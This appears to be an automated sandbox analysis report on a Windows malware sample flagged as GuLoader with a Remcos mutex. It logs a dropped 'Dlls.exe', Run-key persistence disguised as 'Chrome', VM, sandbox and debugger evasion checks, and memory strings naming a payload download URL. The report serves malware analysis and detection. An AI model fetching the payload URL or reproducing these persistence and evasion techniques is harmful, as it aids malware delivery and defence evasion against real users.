Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Section loaded: edgegdi.dll Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 8A45D901CAB57A1B65C32AEA2452F56436DCF01C37BDF7875838E6054F395D90
Source: mU9H96igb3.exe Virustotal: Detection: 32%
Source: mU9H96igb3.exe Metadefender: Detection: 25%
Source: mU9H96igb3.exe ReversingLabs: Detection: 24%
Source: C:\Users\user\Desktop\mU9H96igb3.exe File read: C:\Users\user\Desktop\mU9H96igb3.exe Jump to behavior
Source: mU9H96igb3.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\mU9H96igb3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe'
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe'
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe' Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe File created: C:\Users\user\AppData\Roaming\Adobes Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe File created: C:\Users\user\AppData\Local\Temp\install.vbs Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@19/4@2/2
Source: C:\Users\user\Desktop\mU9H96igb3.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:304:WilStaging_02
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-HCJBCA
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_03
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Source: Window Recorder Window detected: More than 3 window changes detected

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_0041A474 push ebp; ret 2_2_0041A4CD
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_0040E9CB push ecx; retf 2_2_0040E9CC
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_004191F0 push ecx; ret 2_2_004191F1
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_004131A3 push ecx; ret 2_2_004132DD
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_004086CE push eax; retf 2_2_004086CF
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_00411ACE push ecx; ret 2_2_00411B05
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_004132DE push ecx; ret 2_2_0041331D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_0041729D push edx; retf 2_2_004172A6
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_0040DAAA push ecx; ret 2_2_0040DAD5
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_0040E6B3 push ecx; ret 2_2_0040E6C1
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_00417AB9 push eax; ret 2_2_00417AC3
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_0040A750 push ss; retf 2_2_0040A751
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_00411B06 push ecx; ret 2_2_00411B05
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_00407B81 push esi; retf 2_2_00407B83
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BE267D push FFFFFF94h; retf 2_2_02BE2B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02C04084 push FFFFFF94h; retf 2_2_02BE2B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BE2A10 push FFFFFF94h; retf 2_2_02BE2B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BE1611 push esi; iretd 2_2_02BE167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BE67BC push es; ret 2_2_02BE67F4
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF6BF6 push FFFFFF94h; retf 2_2_02BE2B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BE1327 push esi; iretd 2_2_02BE167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BE1366 push esi; iretd 2_2_02BE167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0056267D push FFFFFF94h; retf 9_2_00562B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00584084 push FFFFFF94h; retf 9_2_00562B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00562A10 push FFFFFF94h; retf 9_2_00562B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00561611 push esi; iretd 9_2_0056167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00561366 push esi; iretd 9_2_0056167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00561327 push esi; iretd 9_2_0056167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00576BF6 push FFFFFF94h; retf 9_2_00562B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_005667BC push es; ret 9_2_005667F4
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_0041A474 push ebp; ret 15_2_0041A4CD

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\mU9H96igb3.exe File created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Jump to dropped file

Boot Survival:

barindex
Creates an undocumented autostart registry key
Source: C:\Users\user\Desktop\mU9H96igb3.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run Chrome Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chrome Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chrome Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\mU9H96igb3.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Dlls.exe, 00000012.00000002.138718337791.000000000073C000.00000004.00000020.sdmp Binary or memory string: TROGRAM FILES\QEMU-GA\QEMU-GA.EXET
Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTP://IMPLANTECAPILARPEREIRA.COM/NETGENERATION10%20STARTUP_KCFPCD130.BINHTTP://IMPLANTECAPILARPEREIRA.COM/NETGENERATION10%20STARTUP_KCFPCD130.BIN
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe TID: 7708 Thread sleep count: 9188 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe TID: 7708 Thread sleep time: -45940s >= -30000s Jump to behavior
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Thread sleep count: Count: 9188 delay: -5 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BFFBA1 rdtsc 2_2_02BFFBA1
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Window / User API: threadDelayed 9188 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Window / User API: foregroundWindowGot 478 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe System information queried: ModuleInformation Jump to behavior
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Dlls.exe, 00000012.00000002.138718337791.000000000073C000.00000004.00000020.sdmp Binary or memory string: trogram Files\Qemu-ga\qemu-ga.exet
Source: Dlls.exe, 00000013.00000002.142216361110.00000000008F5000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWw4
Source: Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: mU9H96igb3.exe, 00000009.00000002.137983452106.00000000009A5000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW(<
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: mU9H96igb3.exe, 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, Dlls.exe, 00000013.00000002.142216361110.00000000008F5000.00000004.00000020.sdmp, Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp, Dlls.exe, 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binhttp://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bin
Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Dlls.exe, 00000014.00000002.139081030100.00000000007C5000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW :WA
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\mU9H96igb3.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BFFBA1 rdtsc 2_2_02BFFBA1
Contains functionality to read the PEB
